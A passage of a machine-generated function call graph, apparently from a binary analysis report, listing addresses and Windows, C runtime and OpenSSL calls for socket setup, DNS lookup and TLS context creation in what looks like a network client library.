123785->123780 123787 7ffda5575763 123786->123787 123789 7ffda557576c 123787->123789 123790 7ffda55757bc 123787->123790 123791 7ffda55757fa 123787->123791 123788 7ffda5575775 123788->123780 123789->123788 123797 7ffda5576120 QueryPerformanceCounter GetTickCount 123789->123797 123795 7ffda5576120 QueryPerformanceCounter GetTickCount 123790->123795 123791->123789 123796 7ffda5576120 QueryPerformanceCounter GetTickCount 123791->123796 123795->123789 123796->123789 123797->123788 123798 7ffda5586c50 AcquireSRWLockExclusive 123799 7ffda5586e20 26 API calls 123798->123799 123800 7ffda5586c6e ReleaseSRWLockExclusive 123799->123800 123801 7ffda55cef50 123802 7ffda55cef86 123801->123802 123817 7ffda55cef7b 123801->123817 123803 7ffda55ceff6 123802->123803 123804 7ffda55cf074 123802->123804 123802->123817 123807 7ffda55ceffe 123803->123807 123808 7ffda55cf01f 123803->123808 123805 7ffda55cf078 123804->123805 123806 7ffda55cf08e 123804->123806 123836 7ffda55830a0 6 API calls 123805->123836 123810 7ffda55cf0b9 123806->123810 123812 7ffda55cf0a3 123806->123812 123834 7ffda55830a0 6 API calls 123807->123834 123815 7ffda55cf00d 123808->123815 123835 7ffda55830a0 6 API calls 123808->123835 123819 7ffda55cc9c0 123810->123819 123837 7ffda55830a0 6 API calls 123812->123837 123816 7ffda55bf210 2 API calls 123815->123816 123815->123817 123816->123817 123820 7ffda55cc9ee 123819->123820 123821 7ffda557b6e0 8 API calls 123820->123821 123830 7ffda55cca2d 123820->123830 123833 7ffda55cc9f6 123820->123833 123822 7ffda55cca19 123821->123822 123824 7ffda55ccad3 123822->123824 123838 7ffda55ccb80 123822->123838 123823 7ffda55ccb12 123823->123833 123933 7ffda55cd680 21 API calls 123823->123933 123824->123833 123932 7ffda55830a0 6 API calls 123824->123932 123825 7ffda557b6e0 8 API calls 123825->123830 123830->123823 123830->123824 123830->123825 123831 7ffda55ccadd WSAGetLastError 123830->123831 123830->123833 123881 7ffda55cd010 123830->123881 123931 7ffda55830a0 6 API calls 123831->123931 123833->123815 123834->123815 123835->123815 123836->123815 123837->123815 123839 7ffda55ccbc3 123838->123839 123840 7ffda55ccc0e 123839->123840 123934 7ffda5583190 6 API calls 123839->123934 123842 7ffda55ccc14 GetModuleHandleW GetProcAddress 123840->123842 123843 7ffda55ccc5e 123840->123843 123842->123843 123844 7ffda55ccc36 123842->123844 123845 7ffda55ccfc3 123843->123845 123848 7ffda55ccc6f 123843->123848 123844->123843 123945 7ffda55830a0 6 API calls 123845->123945 123847 7ffda55d5780 6 API calls 123849 7ffda55ccfe6 123847->123849 123850 7ffda55ccd31 123848->123850 123864 7ffda55ccd66 123848->123864 123935 7ffda5583190 6 API calls 123848->123935 123849->123830 123852 7ffda55ccde7 123850->123852 123936 7ffda55cf520 memmove 123850->123936 123854 7ffda55cce3a calloc 123852->123854 123855 7ffda55ccde5 123852->123855 123857 7ffda55cce56 123854->123857 123858 7ffda55cce6f 123854->123858 123855->123852 123855->123854 123856 7ffda55ccd4f 123859 7ffda55ccd57 123856->123859 123860 7ffda55ccd70 memmove 123856->123860 123940 7ffda55830a0 6 API calls 123857->123940 123866 7ffda55cced2 free 123858->123866 123873 7ffda55ccf49 123858->123873 123937 7ffda55830a0 6 API calls 123859->123937 123863 7ffda55ccd8f 123860->123863 123938 7ffda55cf5e0 memmove 123863->123938 123864->123847 123867 7ffda55b9b00 15 API calls 123866->123867 123869 7ffda55ccef1 123867->123869 123868 7ffda55ccdd2 123939 7ffda5583190 6 API calls 123868->123939 123871 7ffda55ccf33 123869->123871 123872 7ffda55cceff 123869->123872 123943 7ffda55830a0 6 API calls 123871->123943 123874 7ffda55ccf07 123872->123874 123875 7ffda55ccf1d 123872->123875 123879 7ffda55ccf13 123873->123879 123944 7ffda55830a0 6 API calls 123873->123944 123941 7ffda55830a0 6 API calls 123874->123941 123942 7ffda55830a0 6 API calls 123875->123942 123879->123864 123882 7ffda55cd04e 123881->123882 123883 7ffda55cd0ab 123882->123883 123884 7ffda55cd083 malloc 123882->123884 123900 7ffda55cd62d 123882->123900 123885 7ffda55cd0b4 malloc 123883->123885 123886 7ffda55cd0de 123883->123886 123884->123883 123884->123900 123885->123886 123885->123900 123887 7ffda55cd0f1 realloc 123886->123887 123896 7ffda55cd14a 123886->123896 123888 7ffda55cd106 123887->123888 123887->123896 123946 7ffda55830a0 6 API calls 123888->123946 123890 7ffda55cd1ab malloc 123893 7ffda55cd23f memmove 123890->123893 123890->123900 123891 7ffda55cd115 123894 7ffda55d5780 6 API calls 123891->123894 123892 7ffda55cd3a1 123892->123900 123948 7ffda55830a0 6 API calls 123892->123948 123898 7ffda55cd2a0 free 123893->123898 123897 7ffda55cd139 123894->123897 123895 7ffda55cd392 123947 7ffda55830a0 6 API calls 123895->123947 123896->123892 123896->123895 123911 7ffda55cd19b 123896->123911 123897->123830 123898->123900 123898->123911 123902 7ffda55b9b00 15 API calls 123907 7ffda55cd5be 123902->123907 123903 7ffda55cd617 123956 7ffda55830a0 6 API calls 123903->123956 123904 7ffda55cd601 123955 7ffda55830a0 6 API calls 123904->123955 123906 7ffda55cd5eb 123954 7ffda55830a0 6 API calls 123906->123954 123907->123903 123907->123904 123907->123906 123953 7ffda55830a0 6 API calls 123907->123953 123911->123890 123911->123892 123912 7ffda55cd36d memmove 123911->123912 123914 7ffda55cd3e7 123911->123914 123916 7ffda55cd557 123911->123916 123912->123911 123913 7ffda55cd390 123912->123913 123913->123914 123914->123900 123915 7ffda55cd50a 123914->123915 123914->123916 123917 7ffda55cd47d 123914->123917 123918 7ffda55b9b00 15 API calls 123915->123918 123916->123900 123916->123902 123920 7ffda55cd4f7 123917->123920 123921 7ffda55cd493 memset 123917->123921 123919 7ffda55cd51e 123918->123919 123951 7ffda55830a0 6 API calls 123919->123951 123923 7ffda55cd53a CertFreeCertificateContext 123920->123923 123924 7ffda55cd540 123920->123924 123927 7ffda55cd4b8 123921->123927 123923->123924 123924->123916 123952 7ffda55830a0 6 API calls 123924->123952 123926 7ffda55cd4f9 123950 7ffda55830a0 6 API calls 123926->123950 123927->123920 123927->123926 123929 7ffda55cd4d4 123927->123929 123929->123920 123949 7ffda55830a0 6 API calls 123929->123949 123931->123833 123932->123833 123933->123833 123934->123840 123935->123850 123936->123856 123937->123864 123938->123868 123939->123855 123940->123864 123941->123879 123942->123879 123943->123879 123944->123879 123945->123864 123946->123891 123947->123892 123948->123914 123949->123920 123950->123920 123951->123920 123952->123916 123953->123906 123954->123904 123955->123903 123956->123900 123957 7ffd94245670 123958 7ffd9424567c _Getctype 123957->123958 123965 7ffd942c8178 123958->123965 123960 7ffd9424569e 123971 7ffd9424a600 107 API calls 2 library calls 123960->123971 123962 7ffd9424578a 123972 7ffd942ca510 8 API calls 2 library calls 123962->123972 123964 7ffd9424579d 123973 7ffd942e4e58 123965->123973 123967 7ffd942c818a 123967->123960 123971->123962 123972->123964 123974 7ffd942e4e78 123973->123974 123975 7ffd942e4e61 123973->123975 123986 7ffd942e7ed0 123974->123986 123992 7ffd942d93a8 13 API calls _Getctype 123975->123992 123978 7ffd942e4e66 123993 7ffd942d97d4 102 API calls _invalid_parameter_noinfo_noreturn 123978->123993 123980 7ffd942c8186 123980->123967 123985 7ffd942c7ba0 104 API calls Concurrency::cancel_current_task 123980->123985 123987 7ffd942e7eec 123986->123987 123988 7ffd942e7f0e 123986->123988 123987->123988 123996 7ffd942e7760 123987->123996 124016 7ffd942e5660 123988->124016 123992->123978 123993->123980 123997 7ffd942e7850 123996->123997 124006 7ffd942e7795 __crtLCMapStringW 123996->124006 124042 7ffd942e4a90 EnterCriticalSection 123997->124042 123999 7ffd942e77ba LoadLibraryW 124002 7ffd942e78df 123999->124002 124003 7ffd942e77df GetLastError 123999->124003 124001 7ffd942e78f8 GetProcAddressForCaller 124001->123997 124002->124001 124007 7ffd942e78ef FreeLibrary 124002->124007 124003->124006 124006->123997 124006->123999 124006->124001 124015 7ffd942e7819 LoadLibraryExW 124006->124015 124007->124001 124015->124002 124015->124006 124043 7ffd942efbb4 124016->124043 124065 7ffd942efb6c 124043->124065 124070 7ffd942e4a90 EnterCriticalSection 124065->124070 124337 7ffda55a63aa 124338 7ffda55a63bb 124337->124338 124356 7ffda55911e0 124338->124356 124340 7ffda55a63ec 124342 7ffda55a6418 124340->124342 124367 7ffda5583190 6 API calls 124340->124367 124344 7ffda55a645a 124342->124344 124347 7ffda55a60d8 124342->124347 124360 7ffda5591a00 124342->124360 124345 7ffda557b6e0 8 API calls 124344->124345 124354 7ffda55a61d5 124344->124354 124346 7ffda55a6fd7 124345->124346 124348 7ffda55a7006 124346->124348 124349 7ffda55a61b5 124346->124349 124346->124354 124368 7ffda55830a0 6 API calls 124348->124368 124366 7ffda55830a0 6 API calls 124349->124366 124350 7ffda55a70fe 124350->124347 124370 7ffda55a4250 6 API calls 124350->124370 124354->124347 124354->124350 124369 7ffda55c1670 37 API calls 124354->124369 124357 7ffda5591202 124356->124357 124371 7ffda5592190 124357->124371 124359 7ffda5591220 124359->124340 124361 7ffda5591a22 124360->124361 124380 7ffda55c21f0 124361->124380 124363 7ffda5591a36 124365 7ffda5591a60 124363->124365 124388 7ffda55c1670 37 API calls 124363->124388 124365->124344 124366->124354 124367->124342 124368->124354 124369->124350 124370->124347 124372 7ffda55921d0 124371->124372 124373 7ffda55922ae _time64 124372->124373 124375 7ffda55922d6 124372->124375 124378 7ffda55922f2 124372->124378 124373->124375 124374 7ffda55d5780 6 API calls 124376 7ffda559236a 124374->124376 124375->124378 124379 7ffda5583190 6 API calls 124375->124379 124376->124359 124378->124374 124379->124378 124381 7ffda55ab550 2 API calls 124380->124381 124382 7ffda55c221c 124381->124382 124383 7ffda55c222c 124382->124383 124384 7ffda55bf210 2 API calls 124382->124384 124383->124363 124385 7ffda55c2252 124384->124385 124386 7ffda557b3d0 6 API calls 124385->124386 124387 7ffda55c227f 124385->124387 124386->124387 124387->124363 124388->124365 124389 7ffda557ade0 124390 7ffda557ae07 124389->124390 124395 7ffda557ae19 124389->124395 124391 7ffda557aea3 124392 7ffda557aed1 calloc 124393 7ffda557b156 124392->124393 124397 7ffda557aef6 124392->124397 124394 7ffda557b15b free free 124393->124394 124394->124391 124395->124391 124395->124392 124395->124397 124398 7ffda557b17c 124395->124398 124403 7ffda55cf750 free free 124395->124403 124406 7ffda55cf6a0 free free 124395->124406 124397->124391 124397->124394 124397->124395 124404 7ffda559b5c0 calloc free 124397->124404 124405 7ffda5575670 calloc free 124397->124405 124407 7ffda55830a0 6 API calls 124398->124407 124403->124395 124404->124397 124405->124397 124406->124395 124407->124391 124408 7ffda5572360 124409 7ffda55723a8 124408->124409 124412 7ffda55723ad 124408->124412 124418 7ffda5591460 124409->124418 124411 7ffda55bf210 2 API calls 124413 7ffda55723fb 124411->124413 124412->124411 124423 7ffda5572b20 calloc 124413->124423 124416 7ffda557241a 124419 7ffda55914b0 socket 124418->124419 124422 7ffda559146e 124418->124422 124420 7ffda55914d6 closesocket 124419->124420 124421 7ffda55914c9 124419->124421 124420->124412 124421->124412 124422->124412 124424 7ffda5572b7e memset malloc 124423->124424 124425 7ffda5572cd5 _errno 124423->124425 124426 7ffda5572c37 124424->124426 124427 7ffda5572c08 InitializeCriticalSectionEx 124424->124427 124450 7ffda5572ce0 124425->124450 124428 7ffda5572c6b 124426->124428 124429 7ffda5572c5a closesocket 124426->124429 124462 7ffda55b6b40 socket 124427->124462 124433 7ffda5572c84 free 124428->124433 124434 7ffda5572c74 DeleteCriticalSection free 124428->124434 124429->124428 124430 7ffda55d5780 6 API calls 124435 7ffda5572416 124430->124435 124437 7ffda5572c9d 124433->124437 124434->124433 124435->124416 124461 7ffda55830a0 6 API calls 124435->124461 124436 7ffda5572d0b _strdup 124436->124426 124438 7ffda5572d2b free _strdup 124436->124438 124439 7ffda5572caf closesocket 124437->124439 124440 7ffda5572cb5 memset free 124437->124440 124441 7ffda5572d51 124438->124441 124459 7ffda5572e31 124438->124459 124439->124440 124440->124425 124442 7ffda5572f06 124441->124442 124452 7ffda5572d8c MultiByteToWideChar 124441->124452 124442->124450 124451 7ffda5572f1e _errno 124442->124451 124443 7ffda5572fa4 free 124443->124425 124444 7ffda5572e4b EnterCriticalSection LeaveCriticalSection 124445 7ffda5572f41 124444->124445 124446 7ffda5572e8e 124444->124446 124447 7ffda5572f46 GetAddrInfoExCancel WaitForSingleObject CloseHandle 124445->124447 124455 7ffda5572f67 124445->124455 124448 7ffda5572e97 CloseHandle 124446->124448 124449 7ffda5572f36 CloseHandle 124446->124449 124447->124455 124453 7ffda5572f8d 124448->124453 124449->124453 124450->124430 124451->124459 124452->124442 124454 7ffda5572dbe MultiByteToWideChar 124452->124454 124456 7ffda5572f98 closesocket 124453->124456 124454->124442 124457 7ffda5572def swprintf_s CreateEventW 124454->124457 124458 7ffda5572f80 free 124455->124458 124456->124443 124457->124459 124460 7ffda5572ea5 GetAddrInfoExW 124457->124460 124458->124453 124459->124443 124459->124444 124460->124450 124461->124416 124463 7ffda55b6b8b 124462->124463 124464 7ffda55b6b90 htonl setsockopt 124462->124464 124467 7ffda55d5780 6 API calls 124463->124467 124465 7ffda55b6c15 bind 124464->124465 124466 7ffda55b6db2 closesocket closesocket closesocket 124464->124466 124465->124466 124468 7ffda55b6c31 getsockname 124465->124468 124466->124463 124469 7ffda5572c2f 124467->124469 124468->124466 124470 7ffda55b6c4b 124468->124470 124469->124426 124469->124436 124470->124466 124471 7ffda55b6c55 listen 124470->124471 124471->124466 124472 7ffda55b6c6c socket 124471->124472 124472->124466 124473 7ffda55b6c89 connect 124472->124473 124473->124466 124474 7ffda55b6ca5 124473->124474 124474->124466 124475 7ffda55ae560 15 API calls 124474->124475 124476 7ffda55b6cd9 accept 124475->124476 124476->124466 124477 7ffda55b6cf5 124476->124477 124478 7ffda55bf210 2 API calls 124477->124478 124479 7ffda55b6cfe 124478->124479 124479->124466 124480 7ffda55b6d20 send 124479->124480 124486 7ffda55b6d33 124480->124486 124481 7ffda55ae560 15 API calls 124482 7ffda55b6d56 recv 124481->124482 124483 7ffda55b6d76 WSAGetLastError 124482->124483 124482->124486 124484 7ffda55b6e21 124484->124466 124487 7ffda55b6e38 closesocket 124484->124487 124486->124466 124486->124481 124486->124484 124487->124463 124488 7ffda3774140 124498 7ffda3782370 124488->124498 124490 7ffda3774975 124541 7ffda3796230 124490->124541 124493 7ffda3774150 124493->124490 124494 7ffda37741fc 124493->124494 124495 7ffda377497a 124493->124495 124539 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124494->124539 124495->124490 124540 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124495->124540 124499 7ffda37823a1 124498->124499 124500 7ffda37823b6 124498->124500 124550 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124499->124550 124502 7ffda37823d5 memcpy 124500->124502 124503 7ffda378240c 124500->124503 124502->124503 124508 7ffda3782469 memcpy 124503->124508 124509 7ffda3782493 124503->124509 124511 7ffda37824d0 124503->124511 124504 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 124506 7ffda378280b 124504->124506 124506->124493 124507 7ffda378257b WSAGetLastError 124507->124511 124513 7ffda37825d6 124507->124513 124508->124509 124509->124511 124514 7ffda37824df 124509->124514 124516 7ffda37824be realloc 124509->124516 124510 7ffda378258a 124515 7ffda3782593 124510->124515 124555 7ffda37763c0 124510->124555 124511->124507 124511->124510 124511->124513 124511->124515 124552 7ffda3789f20 38 API calls Concurrency::details::SchedulerProxy::DeleteThis 124511->124552 124512 7ffda37823ad 124512->124504 124513->124512 124513->124515 124518 7ffda3782662 _time64 124513->124518 124519 7ffda3782626 124513->124519 124521 7ffda3782523 124514->124521 124524 7ffda3782502 realloc 124514->124524 124515->124512 124516->124511 124516->124514 124522 7ffda37826a1 select 124518->124522 124553 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124519->124553 124551 7ffda378c210 free realloc memcpy free Concurrency::details::SchedulerProxy::DeleteThis 124521->124551 124528 7ffda37826e1 WSAGetLastError 124522->124528 124529 7ffda3782726 124522->124529 124523 7ffda3782635 124523->124515 124554 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124523->124554 124524->124511 124524->124521 124528->124518 124531 7ffda37826f2 WSAGetLastError 124528->124531 124529->124515 124529->124523 124571 7ffda3789f20 38 API calls Concurrency::details::SchedulerProxy::DeleteThis 124529->124571 124530 7ffda3782536 124530->124511 124530->124512 124569 7ffda378c450 21 API calls Concurrency::details::SchedulerProxy::DeleteThis 124531->124569 124534 7ffda378270d 124570 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124534->124570 124536 7ffda3782762 WSAGetLastError 124536->124515 124537 7ffda378275b 124536->124537 124537->124510 124537->124523 124537->124536 124572 7ffda3789f20 38 API calls Concurrency::details::SchedulerProxy::DeleteThis 124537->124572 124539->124490 124540->124490 124542 7ffda3796239 124541->124542 124543 7ffda3796664 IsProcessorFeaturePresent 124542->124543 124544 7ffda3774dc9 124542->124544 124545 7ffda379667c 124543->124545 124573 7ffda3796968 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 124545->124573 124547 7ffda379668f 124574 7ffda3796630 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 124547->124574 124550->124512 124551->124530 124552->124511 124553->124523 124554->124510 124556 7ffda37763df 124555->124556 124557 7ffda37763f2 124556->124557 124558 7ffda37763ec closesocket 124556->124558 124559 7ffda3776441 124557->124559 124560 7ffda3776422 free free 124557->124560 124558->124557 124561 7ffda377647f 124559->124561 124562 7ffda3776460 free free 124559->124562 124560->124559 124560->124560 124563 7ffda3776492 free 124561->124563 124564 7ffda377649f 124561->124564 124562->124561 124562->124562 124563->124564 124565 7ffda37764ab FreeCredentialsHandle free 124564->124565 124566 7ffda37764c5 124564->124566 124565->124566 124567 7ffda37764d1 DeleteSecurityContext free 124566->124567 124568 7ffda37764eb 124566->124568 124567->124568 124568->124515 124569->124534 124570->124529 124571->124537 124572->124537 124573->124547 124575 7ffda558c620 124579 7ffda558c6b4 124575->124579 124608 7ffda558c817 124575->124608 124576 7ffda558c8a5 getsockname 124577 7ffda558c8c8 WSAGetLastError 124576->124577 124578 7ffda558c8f1 inet_ntop 124576->124578 124611 7ffda558c8e2 124577->124611 124586 7ffda558c92b 124578->124586 124594 7ffda558cad3 124578->124594 124580 7ffda558c6db strchr 124579->124580 124581 7ffda558c712 124579->124581 124579->124608 124583 7ffda558c75c 124580->124583 124584 7ffda558c716 strchr 124581->124584 124585 7ffda558c764 strchr 124581->124585 124583->124585 124589 7ffda558c7c8 124583->124589 124587 7ffda558c73a inet_pton 124584->124587 124584->124589 124585->124589 124590 7ffda558c77d strtoul 124585->124590 124634 7ffda5591ac0 124586->124634 124587->124583 124589->124594 124602 7ffda558c7f6 memmove 124589->124602 124589->124608 124591 7ffda55c8030 124590->124591 124595 7ffda558c796 strchr 124591->124595 124593 7ffda558cda8 124599 7ffda55d5780 6 API calls 124593->124599 124594->124593 124675 7ffda55777c0 closesocket 124594->124675 124595->124589 124598 7ffda558c7af strtoul 124595->124598 124598->124589 124603 7ffda558cdb9 124599->124603 124600 7ffda558c955 124665 7ffda5572770 8 API calls 124600->124665 124601 7ffda558c962 124601->124611 124666 7ffda55920d0 free 124601->124666 124602->124608 124607 7ffda558c97b 124609 7ffda558c9e6 memmove 124607->124609 124610 7ffda558c9b4 WSAGetLastError 124607->124610 124607->124611 124667 7ffda55777f0 8 API calls 124607->124667 124608->124576 124608->124586 124608->124594 124612 7ffda558cac4 124609->124612 124621 7ffda558ca0f 124609->124621 124610->124607 124610->124611 124674 7ffda55830a0 6 API calls 124611->124674 124669 7ffda55830a0 6 API calls 124612->124669 124614 7ffda558ca10 htons bind 124615 7ffda558cb07 getsockname 124614->124615 124616 7ffda558ca3b WSAGetLastError 124614->124616 124615->124577 124617 7ffda558cb2c listen 124615->124617 124616->124621 124618 7ffda558cb40 WSAGetLastError 124617->124618 124623 7ffda558cb69 124617->124623 124619 7ffda558cb5a 124618->124619 124619->124611 124620 7ffda558cad8 124670 7ffda55830a0 6 API calls 124620->124670 124621->124612 124621->124614 124621->124620 124668 7ffda5583190 6 API calls 124621->124668 124671 7ffda55775b0 18 API calls 124623->124671 124624 7ffda558ca77 getsockname 124624->124577 124624->124621 124627 7ffda558cb02 124627->124594 124628 7ffda558cbf6 htons 124629 7ffda558cbad 124628->124629 124630 7ffda558cce6 124628->124630 124629->124594 124629->124627 124629->124628 124632 7ffda558cc43 124629->124632 124630->124627 124673 7ffda55830a0 6 API calls 124630->124673 124632->124627 124672 7ffda55830a0 6 API calls 124632->124672 124637 7ffda5591b10 124634->124637 124635 7ffda5591b67 124636 7ffda5592190 7 API calls 124635->124636 124638 7ffda5591ba3 124636->124638 124637->124635 124639 7ffda5591b53 124637->124639 124647 7ffda5591bbe 124638->124647 124686 7ffda5583190 6 API calls 124638->124686 124685 7ffda55830a0 6 API calls 124639->124685 124642 7ffda5591c28 inet_pton 124644 7ffda5591c46 inet_pton 124642->124644 124651 7ffda5591b62 124642->124651 124643 7ffda55d5780 6 API calls 124645 7ffda558c950 124643->124645 124646 7ffda5591ce7 124644->124646 124644->124651 124645->124600 124645->124601 124648 7ffda5591460 2 API calls 124646->124648 124653 7ffda5591d08 124646->124653 124647->124642 124647->124651 124648->124653 124649 7ffda5591dd7 htons inet_pton 124654 7ffda5591e2c calloc 124649->124654 124658 7ffda5591db2 124649->124658 124651->124643 124652 7ffda5591d7c 124655 7ffda5591da7 124652->124655 124656 7ffda5591d8a 124652->124656 124653->124649 124653->124651 124653->124652 124660 7ffda5591e51 124654->124660 124664 7ffda5591d9c 124654->124664 124676 7ffda5592630 124655->124676 124687 7ffda5584170 129 API calls 124656->124687 124658->124651 124688 7ffda5572580 10 API calls 124658->124688 124660->124660 124662 7ffda5591eb9 calloc 124660->124662 124663 7ffda5591ed4 htons inet_pton 124662->124663 124662->124664 124663->124664 124664->124658 124664->124664 124665->124601 124666->124607 124667->124607 124668->124624 124669->124594 124670->124627 124671->124629 124672->124627 124673->124627 124674->124594 124675->124593 124677 7ffda559263d 124676->124677 124678 7ffda5591460 124676->124678 124677->124658 124679 7ffda55914b0 socket 124678->124679 124683 7ffda559146e 124678->124683 124680 7ffda55914d6 closesocket 124679->124680 124681 7ffda55914c9 124679->124681 124680->124658 124681->124658 124682 7ffda5591485 124682->124658 124683->124682 124684 7ffda5591460 2 API calls 124683->124684 124684->124682 124685->124651 124686->124647 124687->124664 124688->124651 124689 7ffda3788140 124690 7ffda378816c WSASetLastError ERR_clear_error 124689->124690 124691 7ffda3788153 124689->124691 124695 7ffda3789b23 124690->124695 124750 7ffda3788d70 124691->124750 124698 7ffda3789b2d WSAGetLastError SSL_get_error ERR_get_error 124695->124698 124699 7ffda3789d4e 124695->124699 124696 7ffda378815c 124912 7ffda3788180 124696->124912 124701 7ffda3789b59 124698->124701 124702 7ffda3789c6d 124698->124702 124704 7ffda3789d66 ERR_get_error 124699->124704 124705 7ffda3789dac 124699->124705 124707 7ffda3789b70 124701->124707 124721 7ffda3789b8a 124701->124721 124738 7ffda3789b91 124701->124738 124923 7ffda3788c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124702->124923 124926 7ffda3788c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124704->124926 124928 7ffda3787c30 78 API calls Concurrency::details::SchedulerProxy::DeleteThis 124705->124928 124706 7ffda3789c74 124924 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124706->124924 124918 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124707->124918 124711 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 124715 7ffda3789dd1 124711->124715 124713 7ffda3789d72 124927 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124713->124927 124714 7ffda3789c89 124718 7ffda3789c95 free 124714->124718 124719 7ffda3789c9e 124714->124719 124716 7ffda3789b82 124723 7ffda3788180 3 API calls 124716->124723 124718->124719 124726 7ffda3789cb9 124719->124726 124727 7ffda3789ce3 124719->124727 124720 7ffda3789c4a 124720->124721 124722 7ffda3788180 3 API calls 124720->124722 124721->124711 124722->124721 124723->124721 124724 7ffda3789d87 124724->124720 124730 7ffda3789d97 free 124724->124730 124725 7ffda3789bff 124728 7ffda3789c3b 124725->124728 124731 7ffda3789c08 124725->124731 124729 7ffda3789d09 124726->124729 124743 7ffda3789cd4 124726->124743 124727->124720 124727->124729 124922 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124728->124922 124925 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124729->124925 124732 7ffda3788180 3 API calls 124730->124732 124920 7ffda378c450 21 API calls Concurrency::details::SchedulerProxy::DeleteThis 124731->124920 124736 7ffda3789cdc 124732->124736 124736->124721 124737 7ffda3789d42 124740 7ffda3788180 3 API calls 124737->124740 124738->124725 124741 7ffda3789bd4 124738->124741 124739 7ffda3789c1a 124921 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124739->124921 124740->124736 124919 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124741->124919 124746 7ffda3788180 3 API calls 124743->124746 124744 7ffda3789c2c 124747 7ffda3788180 3 API calls 124744->124747 124746->124736 124747->124721 124748 7ffda3789bf0 124749 7ffda3788180 3 API calls 124748->124749 124749->124721 124760 7ffda3788daa 124750->124760 124753 7ffda3788e98 ERR_get_error 124955 7ffda3788c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124753->124955 124754 7ffda3788ef0 SSL_CTX_set_default_passwd_cb SSL_CTX_set_default_passwd_cb_userdata 124756 7ffda3788f0a SSL_CTX_set_cert_cb SSL_CTX_set_options 124754->124756 124762 7ffda3788f35 124756->124762 124764 7ffda3788fa1 124756->124764 124757 7ffda3788ea4 124956 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124757->124956 124758 7ffda3788ec5 124758->124754 124758->124756 124758->124758 124782 7ffda3788e51 TLS_method SSL_CTX_new 124760->124782 124929 7ffda37765b0 memset SHGetFolderPathA 124760->124929 124761 7ffda3789804 124763 7ffda378980d free 124761->124763 124850 7ffda3789513 124761->124850 124762->124764 124957 7ffda3789df0 isupper tolower isupper tolower 124762->124957 124763->124850 124767 7ffda3789015 124764->124767 124960 7ffda3789df0 isupper tolower isupper tolower 124764->124960 124776 7ffda378904e 124767->124776 124963 7ffda3791830 124767->124963 124768 7ffda3788f53 124773 7ffda3788f58 124768->124773 124774 7ffda3788f73 SSL_CTX_ctrl 124768->124774 124769 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 124770 7ffda3788158 124769->124770 124770->124690 124770->124696 124771 7ffda3788fc7 124777 7ffda3788fe7 SSL_CTX_ctrl 124771->124777 124778 7ffda3788fcc 124771->124778 124958 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124773->124958 124774->124764 124775 7ffda3788f89 ERR_get_error 124774->124775 124959 7ffda3788c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124775->124959 124781 7ffda37890ed 124776->124781 124787 7ffda37890c4 SSL_CTX_set_default_verify_paths 124776->124787 124777->124767 124784 7ffda3788ffd ERR_get_error 124777->124784 124961 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124778->124961 124788 7ffda3789218 124781->124788 124935 7ffda3793450 124781->124935 124782->124753 124782->124758 124962 7ffda3788c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124784->124962 124785 7ffda3788f6e 124790 7ffda37898a9 SSL_CTX_free 124785->124790 124786 7ffda3788f95 124992 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124786->124992 124792 7ffda37890d5 ERR_get_error 124787->124792 124804 7ffda3789213 124787->124804 124793 7ffda3789224 124788->124793 124788->124804 124790->124850 124966 7ffda3788c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124792->124966 124797 7ffda378922e 124793->124797 124798 7ffda378923f 124793->124798 124969 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124797->124969 124970 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124798->124970 124800 7ffda3789894 124800->124790 124805 7ffda37898a0 free 124800->124805 124802 7ffda378910f 124808 7ffda3789124 ERR_get_error 124802->124808 124834 7ffda378914f 124802->124834 124804->124804 124806 7ffda3791830 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 124804->124806 124809 7ffda378927e 124804->124809 124805->124790 124806->124809 124807 7ffda37892d1 SSL_new 124813 7ffda378939f SSL_set_ex_data 124807->124813 124814 7ffda3789873 ERR_get_error 124807->124814 124809->124807 124812 7ffda3793450 67 API calls 124809->124812 124817 7ffda37892f7 124812->124817 124813->124814 124818 7ffda37893b4 124813->124818 124991 7ffda3788c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124814->124991 124821 7ffda3789347 124817->124821 124822 7ffda37892fb _errno 124817->124822 124975 7ffda37898f0 9 API calls Concurrency::details::SchedulerProxy::DeleteThis 124818->124975 124820 7ffda378914a 124820->124800 124821->124807 124833 7ffda3789359 ERR_get_error 124821->124833 124822->124807 124824 7ffda3789306 _errno 124822->124824 124824->124807 124826 7ffda3789311 _errno 124824->124826 124825 7ffda37893c2 124825->124814 124827 7ffda37893ca SSL_CTX_free 124825->124827 124971 7ffda3793e00 18 API calls Concurrency::details::SchedulerProxy::DeleteThis 124826->124971 124832 7ffda37893e9 